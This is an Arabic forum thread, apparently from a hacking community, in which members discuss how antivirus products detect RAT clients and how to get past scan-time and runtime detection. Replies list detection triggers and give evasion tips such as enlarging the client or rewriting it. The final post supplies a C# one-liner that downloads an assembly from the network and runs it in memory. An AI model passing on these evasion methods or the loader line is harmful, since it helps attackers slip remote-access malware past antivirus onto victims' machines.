استفسار عن برامج الحمايه

• (واستعينوا بالصبر والصلاة وإنها لكبيرة إلا على الخاشعين)
    لاتضيع صلاتك .. تعتبر الصلاة الركن الثاني من أركان الاسلام، حيث لا يصحّ إسلام مسلمٍ إلا بها

• (وماكان الله معذبهم وهم يستغفرون) ..الاستغفار هو السبيل الأقرب لنيل رضى الله عز وجل
    اللهم أنت ربي لا إله إلى أنت خلقتني وأنا عبدك، وأنا على عهدك ووعدك ما استطعت، أعوذ بك من شر ما صنعت، أبوء لك بنعمتك علي، وأبوء بذنبي فاغفر لي فإنّه لا يغفر الذنوب إلّا أنت

8Ahmad8

:: عضو جديد ::
3 يونيو 2021
6
3
0
نعرف ان برامج الحماية مهمتها حذف الملفات
ايش عرف برنامج الحماية ان الملف فايروس
هل بسبب الاكواد ماتوقع بسببها بس لان في اكواد تشوفها برامج الحماية كلين
ولا بسبب البروسوس هل الحمايه تركز على البروسس ؟
طيب الموضوع الي كتبتوا قبل كذا
هنا العملية اشتغلة في البرسوس وكانت ناجحة
وفي عمليات تشتغل في البرسوس وتفشل
ولا برامج الحماية تركز على الرام ؟

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
كشف السكان تايم والران تايم سببه يعود الى امور كثيرة لن يستطيع احد ذكرها لك جميعا
بخصوص السكان تايم
احيانا بعض الدوال البرمجية او حتى بعض فانكشنات التشفير
احيانا السترينج الطويل في السورس
احيانا وضع ملف بالريسورس بدون تشفيره تتحسس منه الحمايات واحيانا حتى مع تشفير تتحسس منه
احيانا عدم وضع معلومات للاسمبلي يكشفه سكان تايم لبعض الحمايات
مثل ماقلت لك مارح احد يقدر يجمع لك الاسباب جميعا هذا يعتمد اولا واخرا على خبرتك بالتعامل مع الحمايات
بخصوص الران تايم .. ان الملف سكان تايم ماتم كشفه .. فالسبب هو سلوك الملف ..بالتشغيل .. بالاتصال .. بالتثبيت ..بالنسخ .. الخ

freedom234

27 مايو 2021
8
8
0
شوف اخي العزيز حسب ما جربت انا كل حماية لها خاصية ب الكشف يعني مثلا ويندوز ديفندير ازا كان قيم سيرفر ظاهرة بشكل واضح ب الكود رح يكشفه على العكس من النود على نفس الكود وتخطا النود لكن مكشوف من دينفدير تتبعت الخطوات عند وضع القيم بمفردها بدون نقطة ادخال برضو نكشف من ديفندير افاست ازا بدك ياه يتخطا سكان تايم زيد حجم لكلاينت واضمن لك ان يتخطا اما بنسبة للران تايم ب الافاست اسف ما بقدر قلك طريقة تخطيه لاني هلكت لقدرت حصلها وهي طريق بسيطة جدا جدا ف يعني صديقي بدك تحلل وتشوف هاد الحكي بقلك حسب تجربتي ما بعرف الشباب البقية حسب كل شخص وتفكيره وتجاربه اعرف ناس تخطت اغلب الحمايات بدون اي تشفير فقط ب اعادة كتابة لكلاينت ازا حابب تدخل ه المجال شوف اساسيات سي شارب بعدا ادخل فيديوهات بشار وازا كنت على دراية ب لغة سي شارب تقدر تتعلم من فيديوهات بشار وتغير وتعدل لشو بدك لانها برمجة وب البرمجة تقدر تعمل شغلات كتير يعني ما تتقيد ب تشفيرات بشار يعني تصير انت تنتج تشفيرة ما تخطر ب البال وتكون برايفت خاصة فيك

• أعجبني
التفاعلات: BasharBachir

8Ahmad8

3 يونيو 2021
6
3
0
شكرا بشار
فهمة عليك واحيانا بالران تايم اذا ماكشفوا في السكان تايم يعود ايضا لبرنامج الرات

بس فيه استفسار ايش (احيانا بعض الدوال البرمجية) ياليت تعطيني مثال

• أعجبني
التفاعلات: BasharBachir

8Ahmad8

3 يونيو 2021
6
3
0
شكرا freedom234

شوف الحمايات قدرت اتخطاهم

بس فيه استفسار ماوضحت او وصلت المعلومة هذي (بدون اي تشفير فقط ب اعادة كتابة لكلاينت) ممكن توضح

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,169
2,054
1
شكرا بشار
فهمة عليك واحيانا بالران تايم اذا ماكشفوا في السكان تايم يعود ايضا لبرنامج الرات

بس فيه استفسار ايش (احيانا بعض الدوال البرمجية) ياليت تعطيني مثال
C#:
System.Reflection.Assembly.Load(new WebClient().DownloadData("")).EntryPoint.Invoke(null, null);